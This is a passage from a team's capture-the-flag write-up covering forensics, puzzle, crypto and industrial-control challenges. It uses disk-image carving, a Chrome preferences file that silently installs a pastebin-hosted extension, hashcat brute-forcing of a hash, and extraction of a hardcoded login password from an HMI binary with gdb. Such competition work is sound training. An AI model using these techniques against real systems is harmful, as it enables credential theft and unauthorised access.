it help? $ file sample sample: gzip compressed data, was "mybinary", last modified: Sun Apr 25 15:24:39 2021, from Unix, original size modulo 2^32 8096 $ mv sample{,.gz} && gunzip sample.gz $ file sample sample: ELF 32-bit LSB executable, ARM, EABI5 version 1 (SYSV), dynamically linked, interpreter /lib/ld-linux-armhf.so.3, for GNU/Linux 3.2.0, BuildID[sha1]=3fd9004e328d4fc9efeb43cafc723d6537619610, not stripped Well, that’s definitely better! Let’s look for the flag: $ strings sample | grep flag flag:9d2rfLBi7KtyhaYyUZXbe34aJsgz90kldFFFFFFFg Forensics This section had three challenges and we solved all of them. Russian Dolls (1/2) We get an archive and the following info: Can you find the secret file? We have received from our secret agent 007 this archive that contains a top secret sentence to save the world. Can you find your way through the archive? (SHA1: cf276efbcdb41cd9541d274e608ea4cc6e6635b7) This is your mission! First, let’s see: $ tar -tf GoldenEye.tgz GoldenEye.dd $ tar -xf GoldenEye.tgz $ sudo losetup -f GoldenEye.dd NAME MAJ:MIN RM SIZE RO TYPE MOUNTPOINT loop0 7:0 0 3.7G 0 loop [snip] $ sudo partprobe /dev/loop0 $ lsblk NAME MAJ:MIN RM SIZE RO TYPE MOUNTPOINT loop0 7:0 0 3.7G 0 loop └─loop0p1 259:0 0 3.7G 0 part $ sudo mount /dev/loop0p1 /mnt/ $ cd /mnt $ ls decodeme.7z lost+found pic1.jpg pic2.png pic3.jpeg pic4.jpg pic5.jpeg pic6.jpg $ ls -lh decodeme.7z -rw-rw-r-- 1 user user 437M May 12 12:06 decodeme.7z $ cp decodeme.7z ~/first-ctf-2021/forensics $ cd - ~/first-ctf-2021/forensics $ ls decodeme.7z E2-ECE4X0Ac2ke9.jpeg ghidra GoldenEye.dd goldeneye.sha GoldenEye.tgz $ 7z l decodeme.7z 7-Zip [64] 16.02 : Copyright (c) 1999-2016 Igor Pavlov : 2016-05-21 p7zip Version 16.02 (locale=en_US.UTF-8,Utf16=on,HugeFiles=on,64 bits,4 CPUs Intel(R) Core(TM) i7-10875H CPU @ 2.30GHz (A0652),ASM,AES-NI) Scanning the drive for archives: 1 file, 457303090 bytes (437 MiB) Listing archive: decodeme.7z -- Path = decodeme.7z Type = 7z Physical Size = 457303090 Headers Size = 178 Method = LZMA2:24 7zAES Solid = - Blocks = 1 Date Time Attr Size Compressed Name ------------------- ----- ------------ ------------ ------------------------ 2021-05-12 12:02:45 ....A 1023410176 457302912 secretContainer.dd ------------------- ----- ------------ ------------ ------------------------ 2021-05-12 12:02:45 1023410176 457302912 1 files However, when trying to decompress it, we’re ask for a password we don’t have, so let’s check the images. All of them have a common topic: russian dolls – thus, after trying a few versions “RussianDoll” worked and the archive was decompressed. Rinse and repeat: Set up loop devices, mount the container and check what’s inside: The next two steps contain MBR-formatted disks called MyDear.dmg and within it MyPrecious.dmg and inside it we find flag.txt: $ cat flag.txt From Russia with Love And that is our flag :) Russian Dolls (2/2) The general text is the same as above, but now we have the following task: We have learned that a second hidden sentence is somewhere stored in a file metadata. Have a look and don’t forget to check for specific filesystem artifacts. After initially wasting a lot of time using sleuthkit tools to find anything in the actual metadata, we started checking for filesystem specific files and again in the MyPrecious.dmg we finally found what we were looking for: $ mmls MyPrecious.dmg GUID Partition Table (EFI) Offset Sector: 0 Units are in 512-byte sectors Slot Start End Length Description 000: Meta 0000000000 0000000000 0000000001 Safety Table 001: ------- 0000000000 0000000039 0000000040 Unallocated 002: Meta 0000000001 0000000001 0000000001 GPT Header 003: Meta 0000000002 0000000033 0000000032 Partition Table 004: 000 0000000040 0000499999 0000499960 disk image 005: ------- 0000500000 0000500039 0000000040 Unallocated $ fls -o 0000000040 MyPrecious.dmg r/r 3: $ExtentsFile r/r 4: $CatalogFile r/r 5: $BadBlockFile r/r 6: $AllocationFile r/r 8: $AttributesFile r/r 22: .DS_Store d/d 20: .fseventsd d/d 19: .HFS+ Private Directory Data^ r/r 16: .journal r/r 17: .journal_info_block r/r 23: flag.txt d/d 18: ^^^^HFS+ Private Data $ icat -o 0000000040 MyPrecious.dmg 16 | strings | sed -e 's/Z\+/Z/g' xLNJxV4 Z jrnlhfs+P jrnlhfs+P HFSJ ZH+ HFSJ jrnlhfs+P jrnlhfs+P Z @ jrnlhfs+P jrnlhfs+P HFSJ X@R Z @ jrnlhfs+P jrnlhfs+P HFSJ =???Z @ jrnlhfs+P jrnlhfs+P HFSJ Z The World Is Not Enough @ jrnlhfs+P jrnlhfs+P HFSJ Z @ jrnlhfs+P jrnlhfs+P HFSJ Z @ jrnlhfs+P jrnlhfs+P HFSJ And “The World Is Not Enough” was the solution. We have no idea why HFS+ journals contain so many ’Z’s, but they do, so we filtered them out using sed, in case you wonder ;) Crhome Matser We got a file and the following task: During a forensic investigation of an end user’s Linux machine you find a master preferences file. Your colleague couldn’t get the file to load properly. See if you can. So let’s have a look at this: $ file master_preferences master_preferences: JSON data $ jq . master_preferences { "homepage": "http://www.google.com", "homepage_is_newtabpage": false, "browser": { "show_home_button": true }, "session": { "restore_on_startup": 4, "startup_urls": [ "http://www.google.com/ig" ] }, "bookmark_bar": { "show_on_all_tabs": true }, "sync_promo": { "show_on_first_run_allowed": false }, "distribution": { "import_bookmarks_from_file": "bookmarks.html", "import_bookmarks": true, "import_history": true, "import_home_page": true, "import_search_engine": true, "ping_delay": 60, "suppress_first_run_bubble": true, "do_not_create_desktop_shortcut": true, "do_not_create_quick_launch_shortcut": true, "do_not_launch_chrome": true, "do_not_register_for_update_launch": true, "make_chrome_default": true, "make_chrome_default_for_user": true, "suppress_first_run_default_browser_prompt": true, "system_level": true, "verbose_logging": true }, "first_run_tabs": [ "http://www.example.com", "http://welcome_page", "http://new_tab_page" ], "external_crx": "https://pastebin.com/s2cZFLUi", "external_version": "1.0" } Ok, so what’s in the paste? We find: 00000000: 4372 3234 0300 0000 4502 0000 12ac 040a Cr24....E....... 00000010: a602 3082 0122 300d 0609 2a86 4886 f70d ..0.."0...*.H... 00000020: 0101 0105 0003 8201 0f00 3082 010a 0282 ..........0..... 00000030: 0101 00c6 a2a9 8c2a 49f5 f32b eef7 c420 .......*I..+... 00000040: 2473 5e64 f88a 4a4c d2bf 9728 0074 1a98 $s^d..JL...(.t.. 00000050: 8865 05ed 4137 3841 5f5f 0497 01bb fd3e .e..A78A__.....> 00000060: c708 90dd 8833 ff6a 608e 1c38 b87a d426 .....3.j`..8.z.& 00000070: 07ce 320f c1e3 1b66 77d7 4a87 5e7b cd61 ..2....fw.J.^{.a 00000080: 32b7 8ec6 8c05 7272 3f11 f474 63f4 ce70 2.....rr?..tc..p 00000090: 45c3 91e6 a564 356d 0365 fc99 9f78 b9f5 E....d5m.e...x.. 000000a0: 1444 bf70 8fd6 0d5a a747 a913 f94e ed44 .D.p...Z.G...N.D 000000b0: aa45 eefe 862b 8046 946c 207a cc49 6970 .E...+.F.l z.Iip 000000c0: 2faa 31d4 978a 5f03 c308 4caa 9d07 6276 /.1..._...L...bv 000000d0: 0a96 1469 2cb5 856c ea94 adfd 4502 f410 ...i,..l....E... 000000e0: 4369 0930 b0fe fbfd 193f 5c31 acef 4228 Ci.0.....?\1..B( 000000f0: 4384 f9d2 3009 b42b b8c6 2704 0167 9036 C...0..+..'..g.6 00000100: be20 4ff3 60cb a88e 5563 2aa8 85b7 b8a5 . O.`...Uc*..... 00000110: 6452 100e 42c3 3f0f 37dd 90ca 51a1 1001 dR..B.?.7...Q... 00000120: 7210 ff40 459a 0ffd 886c cd1b d6d5 4e6d r..@E....l....Nm 00000130: c97f 5302 0301 0001 1280 021d 2795 6e4c ..S.........'.nL 00000140: b38d e51f a98b 30d2 92c7 b39d fbdb e0f5 ......0......... 00000150: c307 d4c2 9423 f239 c03e 974a bdc1 e745 .....#.9.>.J...E 00000160: e5b7 a849 e275 c6b5 a0ea 892a 707d bd5e ...I.u.....*p}.^ 00000170: d16f 282c 5948 c65c b4d9 2d42 f6b6 5b29 .o(,YH.\..-B..[) 00000180: e658 9037 fc44 44fa 295a 9e92 4408 515b .X.7.DD.)Z..D.Q[ 00000190: 719e 7014 bd3b 9d42 9e71 2406 63ae 42a2 q.p..;.B.q$.c.B. 000001a0: 7e91 c2c9 8400 76c9 edbe 37be 94ee 0aa8 ~.....v...7..... 000001b0: cd21 dd7b f175 5238 ca39 3a82 320b 402a .!.{.uR8.9:.2.@* 000001c0: 62ba 6bad 397d c90f b060 39c2 f81e f9b0 b.k.9}...`9..... 000001d0: 9ce6 b750 e086 226b 11b4 5525 17d3 62da ...P.."k..U%..b. 000001e0: 00a1 92d6 60de fabc 4af9 5278 7d01 8913 ....`...J.Rx}... 000001f0: b28c e399 12c1 454d 4207 5f92 8e4b 71fd ......EMB._..Kq. 00000200: 19e7 1a1b 0e63 c008 e817 512f a7d8 0e45 .....c....Q/...E 00000210: 5c95 e06d d23e 9af7 f4f3 57e7 4196 1b2a \..m.>....W.A..* 00000220: 165f 9624 8a17 cb91 d398 188a ffd1 9e64 ._.$...........d 00000230: 32a6 237d d099 8316 38ea 9982 f104 120a 2.#}....8....... 00000240: 1018 849b 4bfd edcb a144 5824 ce62 3b6d ....K....DX$.b;m 00000250: f250 4b03 0414 0000 0808 0005 9932 508d .PK..........2P. 00000260: 9ca8 efee 0300 00e9 0300 0008 0000 0069 ...............i 00000270: 636f 6e2e 706e 6701 e903 16fc 8950 4e47 con.png......PNG 00000280: 0d0a 1a0a 0000 000d 4948 4452 0000 0013 ........IHDR.... 00000290: 0000 0013 0806 0000 0072 5036 cc00 0003 .........rP6.... 000002a0: b049 4441 5438 11bd c17d 4cd4 751c c0f1 .IDAT8...}L.u... 000002b0: cffd 7edf dfc1 8596 80b5 9d20 4e86 732e ..~........ N.s. 000002c0: 2506 62c8 7c0a 1f16 1a6c 4854 16c1 2c56 %.b.|....lHT..,V 000002d0: 9ad8 4492 871c 88a4 26a7 079e b001 c993 ..D.....&....... 000002e0: 9808 4426 1707 5ef1 24a0 e650 d3a9 9b5a ..D&..^.$..P...Z 000002f0: ad89 acd6 7c5e 9334 d077 adad cd39 6bf5 ....|^.4.w...9k. 00000300: 8faf 973c 1ea7 c55f 6e48 ac1a f04a b7f6 .... 000003a0: 958e 9f4a e561 3345 2cfd a22e 94c6 6bb8 ...J.a3E,.....k. 000003b0: fc15 2d93 343a 4d8a 1ed1 e9f7 14e2 4b84 ..-.4:M.......K. 000003c0: ad6f 5988 fa21 0d47 d735 4adc 5074 0036 .oY..!.G.5J.Pt.6 000003d0: ed86 54db b504 79d0 7aa5 220f 28fd 9e3d ..T...y.z.".(..= 000003e0: 42a7 6fac 4eab 5527 73b5 89b1 4784 e9b5 B.o.N.U's...G... 000003f0: 4256 8ab0 f78d 396c 3875 9172 d76f d4cf BV....9l8u.r.o.. 00000400: 8e67 b7fd 3876 2764 57df 3f25 7978 cadf .g..8v'dW.?%yx.. 00000410: 8a94 cadb 65d6 f9c2 64d0 16a4 d1f6 a481 ....e...d....... 00000420: 235a 236a bf86 ba23 d485 6838 b71c a2e2 #Z#j...#..h8.... 00000430: 30d8 777e 43a7 8727 7bca cf63 77c1 b6ac 0.w~C..'{..cw... 00000440: ae11 e7b8 6999 e522 86fc c9e4 16d5 5d15 ....i.."......]. 00000450: a9a8 f357 344c d168 19a5 d1ad 1b74 790b ...W4L.h.....ty. 00000460: 0bea ad1c 1e1f 4445 d34d ca7a a068 f916 ......DE.M.z.h.. 00000470: 7a26 4ea5 d47d 8fed 9b3a 6855 06e7 95ce z&N..}...:hU.... 00000480: 51c3 0895 4411 6baf a65d 2f9b 164e 9b8f Q...D.k..]/..N.. 00000490: 99ba 40a1 296c 3eb9 1ff7 b379 e31e 32d7 ..@.)l>....y..2. 000004a0: cee4 d08c 57d8 7910 8add 5011 3c8f f6d8 ....W.y...P.O...y....%q 00000580: 29bb 589e d34b eab6 efc8 2e1a a060 e339 ).X..K.......`.9 00000590: 6a62 d3d9 1bf6 04d5 3334 cafd 752e 89c1 jb......34..u... 000005a0: 573e 42de 04a1 db3c 9a36 650c 1f33 8ce9 W>B....a= 000007a0: a322 4612 3ca2 51d2 212a 25e0 7db6 f0c2 ."F.<.Q.!*%.}... 000007b0: 7b18 4f62 9ce1 0922 05d9 3136 d9fb 02b9 {.Ob..."..16.... 000007c0: ef50 3d43 1243 699e 91aa 020a 3ac2 4651 .P=C.Ci.....:.FQ 000007d0: 1348 2848 2734 9422 64ce 15d5 b25f 12cf .H(H'4."d...._.. 000007e0: 5987 da63 0c3d 4311 c317 1702 6986 0ca2 Y..c.=C.....i... 000007f0: 81ca c488 7508 f0b9 32d0 911a e5a3 e874 ....u...2......t 00000800: c8b7 ecb4 4006 e783 a327 1d9a 18d2 3a5d ....@....'....:] 00000810: 6aa1 3d6b 9f48 bc97 644f 6de0 9c27 532c j.=k.H..dOm..'S, 00000820: a7aa 4415 00cb 98fe 5008 17a5 f9b5 d133 ..D.....P......3 00000830: 6a62 185d 2b78 6d2a 34c5 1913 3547 6a82 jb.]+xm*4...5Gj. 00000840: 456d 2bf2 43d5 0e3e 2907 2c22 9b33 f670 Em+.C..>).,".3.p 00000850: c6d8 e51a fbc9 0e7b 8621 46d4 2691 01ca .......{.!F.&... 00000860: 4316 1dca f98a 24d0 b1e6 465b 342e 923d C.....$...F[4..= 00000870: 810e 0cec 373b aad9 6111 f165 c953 5b6a ....7;..a..e.S[j 00000880: c98d 40d2 3940 c81c 514b edc9 dd2a c3ca ..@.9@..QK...*.. 00000890: a6a1 8b23 1222 6905 de75 a711 beb2 375d ...#."i..u....7] 000008a0: e773 cf68 8811 8cce a0eb 5421 19a9 90bc .s.h......T!.... 000008b0: 27f1 4111 32e8 00c3 6998 8d25 06fb 4199 '.A.2...i..%..A. 000008c0: 8a9e 63f6 6df6 a2c3 11a3 ae32 f921 6d77 ..c.m......2.!mw 000008d0: 3bf9 ff1b 78f6 77f4 0c4f 8c52 1119 4015 ;...x.w..O.R..@. 000008e0: 87e0 249a baa1 abcf 2bdb 67be c473 f290 ..$.....+.g..s.. 000008f0: f257 bb5f 1978 e8de 0ff4 efb9 f14d a2c1 .W._.x.......M.. 00000900: 52f7 0f50 4b03 0414 0000 0808 0040 9932 R..PK........@.2 00000910: 5020 17bf 2b8f 0000 00e4 0000 000a 0000 P ..+........... 00000920: 0070 6f70 7570 2e68 746d 6c75 8f41 0ec2 .popup.htmlu.A.. 00000930: 300c 04ef bcc2 cd03 88b8 a791 1052 cf7c 0............R.| 00000940: 218d ad26 3434 51ea 22f5 f784 1a8e 9cbc !..&44Q."....... 00000950: f2ee 8e65 d361 f6bc 1782 c0cf 644f 4606 ...e.a......dOF. 00000960: 8009 e4f0 239a e4c8 89ec 90dc 0443 5c90 ....#........C\. 00000970: 2a5c f1e5 164f 68b4 7892 5b7d 8d85 61ad *\...Oh.x.[}..a. 00000980: be57 2597 ad9c 1fab b246 cbfe a0ea 1fd6 .W%......F...... 00000990: 8c19 f76f 2f5c fec0 9b21 8971 63ce 0b44 ...o/\...!.qc..D 000009a0: ec95 0fe4 e7bb 9b48 d95b 8a7e 8640 953a .......H.[.~.@.: 000009b0: a325 2247 84dd fac7 336f 504b 0304 1400 .%"G....3oPK.... 000009c0: 0008 0800 039c 3250 00f5 1da0 d500 0000 ......2P........ 000009d0: 4c01 0000 0d00 0000 6d61 6e69 6665 7374 L.......manifest 000009e0: 2e6a 736f 6e45 8e4d 6bc4 2010 86ef f915 .jsonE.Mk. ..... 000009f0: 83e7 45da 1e7b 2b85 40ef b995 1266 7592 ..E..{+.@....fu. 00000a00: 0ce8 286a b285 65ff 7bd5 14f6 e4c7 fbbc ..(j..e.{....... 00000a10: 1ff7 0140 7914 5e28 97f9 a094 3988 7a87 ...@y.^(....9.z. 00000a20: b7cb d014 414f f5a5 4687 2b8c 2c96 127c ....AO..F.+.,..| 00000a30: 1c28 86ac ba34 c052 3689 6339 5d6a da38 .(...4.R6.c9]j.8 00000a40: 03fd 1692 9603 3776 0e6c 0084 b2b1 ac1a ......7v.l...... 00000a50: be0a 5480 a502 962c 2c21 c1e7 3466 40b1 ..T....,,!..4f@. 00000a60: 4076 37d8 823a 6603 6590 d07d e0d1 b1e1 @v7..:f.e..}.... 00000a70: b067 7db6 3e77 aa57 fda2 cead d714 6e99 .g}.>w.W......n. 00000a80: d28c e67f cdbd feb6 850b eeae cc6c 4e43 .............lNC 00000a90: 3b75 94b5 273d e518 e21e 9bde 2f7a 2bde ;u..'=....../z+. 00000aa0: a90a 3c7a 5fa4 e439 b7ca 5c91 ef6e 6c35 .. extension.raw $ file extension.raw extension.raw: Google Chrome extension, version 3 $ mkdir extension $ cd extension/ $ unzip ../extension.raw Archive: ../extension.raw warning [../extension.raw]: 593 extra bytes at beginning or within zipfile (attempting to process anyway) inflating: icon.png inflating: popup.js inflating: popup.html inflating: manifest.json § ls icon.png manifest.json popup.html popup.js $ cat popup.js document.addEventListener('DOMContentLoaded', function() { var checkPageButton = document.getElementById('checkPage'); checkPageButton.addEventListener('click', function() { chrome.tabs.getSelected(null, function(tab) { d = document; d.body.appendChild("00000000: 1f8b 0800 acbc 235e 0003 edcf 3d0a c230 ......#^....=..0 00000010: 18c6 f148 1717 bd81 1870 d049 9336 4d8e ...H.....p.I.6M. 00000020: e10d 943a d441 bbf8 b1bb 7b03 a70e 1ec3 ...:.A....{..... 00000030: 450f e20d 9c5d 8d16 bb14 3a15 44f8 ff20 E....]....:.D.. 00000040: bcbc c933 3c19 4f16 d6cc bf27 5d27 4bd1 ...3<.O....']'K. 00000050: 38a5 9435 46be a7b3 f167 aab0 d80b 712c 8..5F....g....q, 00000060: 7564 b572 910d 7d50 e9c8 6823 a46a be4a ud.r..}P..h#.j.J 00000070: d57e bb4b 36be 4ab2 aacf f958 9ad6 bc17 .~.K6.J....X.... 00000080: 3f91 e5fc 13fd 635b 9c2f 8399 081e d756 ?.....c[./.....V 00000090: c75f dcf2 e734 ebba bc4c 1c5c 70ba f786 ._...4...L.\p... 000000a0: 62f4 b38e 0000 0000 0000 0000 0000 0000 b............... 000000b0: 0080 aa17 cca3 969b 0028 0000 .........(.. "); }); }, false); }, false); Ok, again a hexdump, so put it in a file and convert it to raw again: $ xxd -r extension-js.hexdump > extension-js.raw $ file extension-js.raw extension-js.raw: gzip compressed data, last modified: Sun Jan 19 02:19:24 2020, from Unix, original size 10240 $ cp extension-js.raw extension-js.gz $ ls extension extension-js.gz extension-js.raw hitw_ch1_434MHz_1MSps.wav extension.hexdump extension-js.hexdump extension.raw master_preferences $ gunzip --keep extension-js.gz $ file extension-js extension-js: POSIX tar archive $ tar -tf extension-js ./b64_b64_b64_flag And that’s the flag \o/ Miscellaneous This part had three challenges, all of which were solved by us. Just run with Steve J. We’re given a file, its SHA1 hash, and the following task: Find the executable file attached and run it. No worries, it is not malware and it does NOT need to run with any privileges. Find out what it does and follow the clues. We were a bit conservative in that case and didn’t run the executable, so we did some static analysis instead: $ file runme runme: Mach-O 64-bit x86_64 executable, flags: $ strings runme [snip] @Hang on... [redacted].firstchallenges.ninja Did you catch that? sleepForTimeInterval: dataWithCapacity: appendBytes:length: @_DNSServiceProcessResult @_DNSServiceQueryRecord @_DNSServiceRefDeallocate [snip] _DNSServiceProcessResult _DNSServiceQueryRecord _DNSServiceRefDeallocate [snip] Ok, so we have a domain [redacted].firstchallenges.ninja in there, as well as some references to DNS, so let’s see if anything turns up: $ dig [redacted].firstchallenges.ninja TXT ; <<>> DiG 9.16.15-Debian <<>> [redacted].firstchallenges.ninja TXT ;; global options: +cmd ;; Got answer: ;; ->>HEADER< Nice, that seems to have been a lucky one. The response looks like a hex string, so we decoded it: $ python3 Python 3.9.2 (default, Feb 28 2021, 17:03:44) [GCC 10.2.1 20210110] on linux Type "help", "copyright", "credits" or "license" for more information. >>> import binascii >>> binascii.unhexlify('5f6e635f7463705f323032312e66697273746368616c6c656e6765732e6e696e6a613a38343438') b'_nc_tcp_[redacted].firstchallenges.ninja:8448' >>> Another hint, so we do what we’re told to: $ nc [redacted].firstchallenges.ninja 8448 97ce8d01a9e01cef2b2a9b946c0051ff Trying to decode that value didn’t yield anything useful, so we submitted it as the flag – which was correct :) my man! We receive a JPEG and very straightforward instructions: See if you can located all 7 pieces of the flag. After trying the obvious – looking at the image itself and its exif data – we looked at the file in a simple text editor and the last part of it seemed a bit odd: $ tail -n +75 myman.jpg ������[�H'��C#K_�k��0���]��c[O-�"�.܇�c,��Ķ5��+⥺�5s�IGV�&v������B�?��V?�Q��Y=̶��?���_�=��O=�S*����*ƞ��u9%b4���h,m9����A�]:6(�O��rO�>'�H����fm;�0��@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@A��.Dd June 21, 2020 .Dt MY "" !YouH .Os .Sh NAME .Nm my .Nd the ultimate hacking tool - its like Metasploit but for Ruby developers. .Sh SYNOPSIS .Nm my .Op Fl lOfTheP .Op Ar .Sh DESCRIPTION my is many tools in one. For each .Ar file provided to .Nm my, you can choose to exfiltrate, securely delete, or backdoor the .Ar file. .Nm my is fully undetectable and is the hacking tool of choice for Advanced and persistent APT threats. .Pp If no operands are given, my will dump credentials of all users on the system. If .Nm my is uploaded to a webserver, it can be used as a webshell or to conduct sql injection attacks. .Pp The following options are available: .Bl -tag -width indent .It Fl l Hack the Gibson. .It Fl O output. .It Fl f iteratively inject json into the firewall (with force). .It Fl T modify authentication requests to the sqlite database's caching backend server's load balancer. .It Fl h dump credentials from the Sharepoint client's memory bank. .It Fl e crash the remotely executable's code path. .It Fl P double-click a JPEGs nested for loop recursion. .Sh EXAMPLES The following is how to do a .Nm my hack attack: .Pp .Dl "my -Oh | my" .Sh DIAGNOSTICS Nah. .\" sForThis .Sh ENVIRONMENT .Fn printf "undAl" I am thankful manpage's markup language (groff/troff) never caught on outside of manpages. .Sh COMPATIBILITY The group field is now automatically included in YXZlRm8= the long listing for files in order to be compatible with the .St -p1003.2 specification. .Sh SEE ALSO https://pastebin.com/G5pbzCjR .Sh LEGACY DESCRIPTION All good men and women must take responsibility to create legacies that will take the next generation to a level we could only imagine. .Sh HISTORY An .Nm my command appeared in .At v1 . .Sh BUGS my doesn't cotain any bugs because the authors conducted a ssae16 audit of the source. .Hf /dev/null/ieces For whatever reason, someone has appended some troff data to this image... Our solution was definitely not the most straightforward one, but we simply looked for stuff that looked "odd" and we knew that we’re looking for seven pieces. From top to bottom we identified: !YouH lOfTheP sForThis undAl YXZlRm8= which is aveFo after base64 decoding. https://pastebin.com/G5pbzCjR a paste which contains "Challenge!" /dev/null/ieces Putting them all together in the right order results in !YouHaveFoundAllOfThePiecesForThisChallenge! and that was the flag. The Bit Maker We got a commandlog from a compromised server and the following task: You located a compromised system in your environment. After closer examination, you notice a keylogger installed on the system. A snippet of the keylog are attached. See if you can find the correct bits. The flag is hex values with no spaces or delimiters. The relevant part of the commandlog is: $ ls import random data = [] for idx in xrange(random.randint(3000, 5000)): val = random.randint(0, 255) data.append(val) flag_len = 4 start = len(data) / 2 with open("flag.txt", 'wb') as f: for i in range(start, start + flag_len): f.write(chr(data[i])) data[i] = 0x00 with open("data.bin", 'wb') as f: f.write(''.join([chr(x) for x in data])) $ shasum -a 256 ./* 22585d78ab9223ffca17d0d3cabd4265105f4efbbbb3ebfbbd7ab1b9b4a0dd98 ./data.bin 7928ca875b29e1157b2c6d808df146433598d96eea98bf074fc941ba9246f0d9 ./flag.txt (yes, the output is a bit broken). So we know, our flag’s SHA256 hash and that it is 4 bytes. Time for hashcat: hashcat.bin -a 3 -m 1400 7928ca875b29e1157b2c6d808df146433598d96eea98bf074fc941ba9246f0d9 '?b?b?b?b' hashcat (v6.2.1) starting... * Device #1: WARNING! Kernel exec timeout is not disabled. This may cause "CL_OUT_OF_RESOURCES" or related errors. To disable the timeout, see: https://hashcat.net/q/timeoutpatch * Device #2: WARNING! Kernel exec timeout is not disabled. This may cause "CL_OUT_OF_RESOURCES" or related errors. To disable the timeout, see: https://hashcat.net/q/timeoutpatch nvmlDeviceGetFanSpeed(): Not Supported CUDA API (CUDA 11.2) ==================== * Device #1: GeForce RTX 2070, 7684/7973 MB, 36MCU OpenCL API (OpenCL 1.2 CUDA 11.2.162) - Platform #1 [NVIDIA Corporation] ======================================================================== * Device #2: GeForce RTX 2070, skipped Minimum password length supported by kernel: 0 Maximum password length supported by kernel: 256 Hashes: 1 digests; 1 unique digests, 1 unique salts Bitmaps: 16 bits, 65536 entries, 0x0000ffff mask, 262144 bytes, 5/13 rotates Optimizers applied: * Zero-Byte * Early-Skip * Not-Salted * Not-Iterated * Single-Hash * Single-Salt * Brute-Force * Raw-Hash ATTENTION! Pure (unoptimized) backend kernels selected. Using pure kernels enables cracking longer passwords but for the price of drastically reduced performance. If you want to switch to optimized backend kernels, append -O to your commandline. See the above message to find out about the exact limits. Watchdog: Temperature abort trigger set to 90c Host memory required for this attack: 632 MB 7928ca875b29e1157b2c6d808df146433598d96eea98bf074fc941ba9246f0d9:$HEX[42d14cad] Session..........: hashcat Status...........: Cracked Hash.Name........: SHA2-256 Hash.Target......: 7928ca875b29e1157b2c6d808df146433598d96eea98bf074fc...46f0d9 Time.Started.....: Thu Jun 10 09:12:07 2021 (1 sec) Time.Estimated...: Thu Jun 10 09:12:08 2021 (0 secs) Guess.Mask.......: ?b?b?b?b [4] Guess.Queue......: 1/1 (100.00%) Speed.#1.........: 2013.0 MH/s (6.57ms) @ Accel:4 Loops:128 Thr:1024 Vec:1 Recovered........: 1/1 (100.00%) Digests Progress.........: 2925527040/4294967296 (68.12%) Rejected.........: 0/2925527040 (0.00%) Restore.Point....: 11354112/16777216 (67.68%) Restore.Sub.#1...: Salt:0 Amplifier:0-128 Iteration:0-128 Candidates.#1....: $HEX[73612aac] -> $HEX[c0ff7faf] Hardware.Mon.#1..: Temp: 57c Util: 86% Core:1770MHz Mem:5500MHz Bus:16 Started: Thu Jun 10 09:12:06 2021 Stopped: Thu Jun 10 09:12:09 2021 So, in theory, we have our flag, i.e. 42d14cad. However, it wasn’t accepted and we wasted several tries to find out that we had to convert it to uppercase: The flag was 42D14CAD... Cryptography/Forensics This section had only a single challenge. The Secret Our task says: During a forensics investigation you find a piece of information that might help you learn the miscreant steps. The file is missing. You have only the following: MD5 (mysecret.txt) = 52c76da7c56b606849df5a038d1bb561 Just look it up in an MD5 database, e.g. https://md5.gromweb.com/?md5=52c76da7c56b606849df5a038d1bb561 and the result is admin123. The fun thing about that, however, was the fact that the MD5 sum is actually for admin123 + the appended newline, which led hashcat and john astray, as they remove newlines from entries in wordlists, it seems. ICS This part had the most challenges, but we only solved four. We’re not sure how many it had in total, as we didn’t unlock some of the later ones. Additionally, one of our solves was a crossword puzzle which we won’t consider in this writeup. HMI Pwning - 1 We were given a binary and the following instructions: These challenges involve reverse engineering and exploiting a custom HMI program. Can you determine the password that can be used to log in as the user "engineer"? Note: hmi_coolant is a Linux binary that is safe to run on your local machine. Once running, you can communicate with your local instance of the HMI software via: nc localhost 5050 For solving this challenge, it wasn’t 100% necessary to run the program: $ strings hmi_coolant [snip] HMI Status: - Current User: Engineer - Current User: Administrator - Current User: Guest - System Time: - System Version: - Uptime: %d days %02d:%02d:%02ld engineer staplebatterycorrecthorse administrator [HMI] Available Commands: [snip] check_login [snip] It looks like staplebatterycorrecthorse is the password we want. However, to be sure, we ran the binary using gdb and looked at the check_login function: $ gdb -q hmi_coolant Reading symbols from hmi_coolant...(no debugging symbols found)...done. (gdb) disass check_login [snip] 0x0000000000001def <+43>: lea 0x1339(%rip),%rsi # 0x312f 0x0000000000001df6 <+50>: mov %rax,%rdi 0x0000000000001df9 <+53>: callq 0xe30 0x0000000000001dfe <+58>: test %eax,%eax 0x0000000000001e00 <+60>: jne 0x1e30 0x0000000000001e02 <+62>: mov -0x38(%rbp),%rax 0x0000000000001e06 <+66>: add $0x10,%rax 0x0000000000001e0a <+70>: mov $0x19,%edx 0x0000000000001e0f <+75>: lea 0x1322(%rip),%rsi # 0x3138 0x0000000000001e16 <+82>: mov %rax,%rdi 0x0000000000001e19 <+85>: callq 0xe30 [snip] (gdb) x/s 0x312f 0x312f: "engineer" (gdb) x/s 0x3138 0x3138: "staplebatterycorrecthorse" In verbose: This function first compares its first parameter to the string engineer and if this is the case it compares the second parameter to staplebatterycorrecthorse. Since we know that the first parameter is the username, we can be pretty sure that the second one is the password which was correct. Hiding on the Modbus - 1 The task was: There is a modbus device located at [redacted].firstseclounge.org on TCP port 5020. Can you find the ASCII string hidden in the discrete inputs? Unfortunately we didn’t document this challenge during the CTF and when we wrote the writeup we could reproduce our steps but as the modbus device was no longer active we couldn’t retrieve the flag again. We used the modbus-cli interface and read all data from the discrete inputs: #!/bin/bash for i in {1..90} do modbus [redacted].firstseclounge.org:5020 